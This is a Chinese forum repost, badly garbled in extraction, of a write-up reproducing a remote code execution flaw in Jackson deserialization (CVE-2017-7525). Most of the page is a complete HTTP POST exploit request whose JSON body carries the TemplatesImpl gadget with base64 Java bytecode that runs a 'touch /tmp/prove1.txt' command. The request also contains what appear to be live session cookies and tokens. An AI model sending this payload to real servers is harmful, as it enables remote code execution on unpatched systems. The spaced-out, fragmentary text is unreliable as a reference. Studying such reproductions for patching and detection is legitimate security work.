搜索

[27049] 2020-07-24_Jackson反序列化远程代码执行漏洞复现

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-19
2020-07-24_Jackson反序列化远程代码执行漏洞复现 J a c k s o n       M s 0 8 0 6 7   2 0 2 0 - 0 7 - 2 4 #   , 2 3 # S R S P   T e a m   , 1 7 l i g h t M s 0 8 0 6 7   S R S P   T E A M j a c k s o n J a c k s o n j a v a J S O N J S O N j a v a J a v a J a v a   J s o n 使 便 j s o n d a t a b i n d . O b j e c t M a p p e r J a c k s o n s e t t e r g e t t e r J a c k s o n j a c k s o n - c o r e " " A P I   J s o n P a s e r J s o n G e n e r a t o r J a c k s o n   A P I J s o n G e n e r a t o r J s o n P a r s e r j s o n j a c k s o n - a n n o t a t i o n s j a c k s o n - d a t a b i n d " "     A P I O b j e c t M a p p e r " "   A P I J s o n N o d e " "   A P I " " A P I " " A P I   F a s t j s o n     J a c k s o n F a s t j s o n k e y ,   J a c k s o n     k e y     j a v a b e a n   ,   k e y , , C V E - 2 0 1 7 - 7 5 2 5 J a c k s o n - d a t a b i n d   T a r g e t   c l a s s     g e t t e r   使   S e t t e r l e s s P r o p e r t y     g e t t e r     g e t O u t p u t P r o p e r t i e s ( )   t r a n s l e t B y t e c o d e s   使 J D K 7 u 2 1 c o m . s u n . o r g . a p a c h e . x a l a n . i n t e r n a l . x s l t c . t r a x . T e m p l a t e s I m p l G a d g e t t o u c h / t m p / p r o v e 1 . t x t P O S T   / e x p l o i t   H T T P / 1 . 1 H o s t :   y o u r - i p : 8 0 8 0 C a c h e - C o n t r o l :   m a x - a g e = 0 U p g r a d e - I n s e c u r e - R e q u e s t s :   1 U s e r - A g e n t :   M o z i l l a / 5 . 0   ( W i n d o w s   N T   1 0 . 0 ;   W i n 6 4 ; x 6 4 )   A p p l e W e b K i t / 5 3 7 . 3 6   ( K H T M L ,   l i k e   G e c k o ) A c c e p t :   * / * A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e A c c e p t - L a n g u a g e :   z h - C N , z h ; q = 0 . 9 C o o k i e :   w p - s e t t i n g s - t i m e - 1 = 1 5 8 5 8 3 0 9 0 0 ; p r o _ e n d = - 1 ;   o r d e r = i d % 2 0 d e s c ;   l t d _ e n d = - 1 ;   m e m S i z e = 3 7 8 9 ;   s i t e s _ p a t h = / w w w / w w w r o o t ; b a c k u p _ p a t h = / w w w / b a c k u p ;   u p l o a d S i z e = 1 0 7 3 7 4 1 8 2 4 ;   r a n k = a ;   P a t h = / w w w / w w w r o o t ; s e r v e r T y p e = a p a c h e ;   f o r c e = 0 ;   P H P S E S S I D = t i p 0 0 u t 1 i k r h b t i 1 8 c 0 l h 8 8 g e 2 ; s e c u r i t y = i m p o s s i b l e ; B T _ P A N E L _ 6 = 0 9 8 4 f 7 2 c - 0 c b 3 - 4 3 f c - b 5 7 c - f 0 5 2 0 9 1 5 f 4 7 e . J t L 1 _ X K 2 M 1 R 1 G R J w E 0 n j V z s s K h s ; r e q u e s t _ t o k e n = K I 5 7 W H w i x J f k e g r c q L r E 7 D C e x a 8 z j G 7 U Y k 4 h 7 v 6 S w B B Q 2 K X 0 ;   p n u l l = 1 ;   p 5 = 1 ; l o a d _ p a g e = n u l l ;   s o f t T y p e = - 1 ;   l o a d _ t y p e = - 1 ;   l o a d _ s e a r c h = u n d e f i n e d C o n n e c t i o n :   c l o s e C o n t e n t - T y p e :   a p p l i c a t i o n / j s o n C o n t e n t - L e n g t h :   1 2 9 8   {   " p a r a m " :   [       " c o m . s u n . o r g . a p a c h e . x a l a n . i n t e r n a l . x s l t c . t r a x . T e m p l a t e s I m p l " ,         {           " t r a n s l e t B y t e c o d e s " :   [   " y v 6 6 v g A A A D M A K A o A B A A U C Q A D A B U H A B Y H A B c B A A V w Y X J h b Q E A E k x q Y X Z h L 2 x h b m c v T 2 J q Z W N 0 O w E A B j x p b m l 0 P g E A A y g p V g E A B E N v Z G U B A A 9 M a W 5 l T n V t Y m V y V G F i b G U B A B J M b 2 N h b F Z h c m l h Y m x l V G F i b G U B A A R 0 a G l z A Q A c T G N v b S 9 i M W 5 n e i 9 z Z W M v b W 9 k Z W w v V G F y Z 2 V 0 O w E A C G d l d F B h c m F t A Q A U K C l M a m F 2 Y S 9 s Y W 5 n L 0 9 i a m V j d D s B A A h z Z X R Q Y X J h b Q E A F S h M a m F 2 Y S 9 s Y W 5 n L 0 9 i a m V j d D s p V g E A C l N v d X J j Z U Z p b G U B A A t U Y X J n Z X Q u a m F 2 Y Q w A B w A I D A A F A A Y B A B p j b 2 0 v Y j F u Z 3 o v c 2 V j L 2 1 v Z G V s L 1 R h c m d l d A E A E G p h d m E v b G F u Z y 9 P Y m p l Y 3 Q B A A g 8 Y 2 x p b m l 0 P g E A E W p h d m E v b G F u Z y 9 S d W 5 0 a W 1 l B w A Z A Q A K Z 2 V 0 U n V u d G l t Z Q E A F S g p T G p h d m E v b G F u Z y 9 S d W 5 0 a W 1 l O w w A G w A c C g A a A B 0 B A B V 0 b 3 V j a C A v d G 1 w L 3 B y b 3 Z l M S 5 0 e H Q I A B 8 B A A R l e G V j A Q A n K E x q Y X Z h L 2 x h b m c v U 3 R y a W 5 n O y l M a m F 2 Y S 9 s Y W 5 n L 1 B y b 2 N l c 3 M 7 D A A h A C I K A B o A I w E A Q G N v b S 9 z d W 4 v b 3 J n L 2 F w Y W N o Z S 9 4 Y W x h b i 9 p b n R l c m 5 h b C 9 4 c 2 x 0 Y y 9 y d W 5 0 a W 1 l L 0 F i c 3 R y Y W N 0 V H J h b n N s Z X Q H A C U K A C Y A F A A h A A M A J g A A A A E A A g A F A A Y A A A A E A A E A B w A I A A E A C Q A A A C 8 A A Q A B A A A A B S q 3 A C e x A A A A A g A K A A A A B g A B A A A A B g A L A A A A D A A B A A A A B Q A M A A 0 A A A A B A A 4 A D w A B A A k A A A A v A A E A A Q A A A A U q t A A C s A A A A A I A C g A A A A Y A A Q A A A A o A C w A A A A w A A Q A A A A U A D A A N A A A A A Q A Q A B E A A Q A J A A A A P g A C A A I A A A A G K i u 1 A A K x A A A A A g A K A A A A C g A C A A A A D g A F A A 8 A C w A A A B Y A A g A A A A Y A D A A N A A A A A A A G A A U A B g A B A A g A G A A I A A E A C Q A A A B Y A A g A A A A A A C r g A H h I g t g A k V 7 E A A A A A A A E A E g A A A A I A E w = = "           ] ,           " t r a n s l e t N a m e " :   " a . b " ,           " o u t p u t P r o p e r t i e s " :   { }         }     ] }
J D K 7 u 2 1 j d k     2 5 0 0 0 +
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理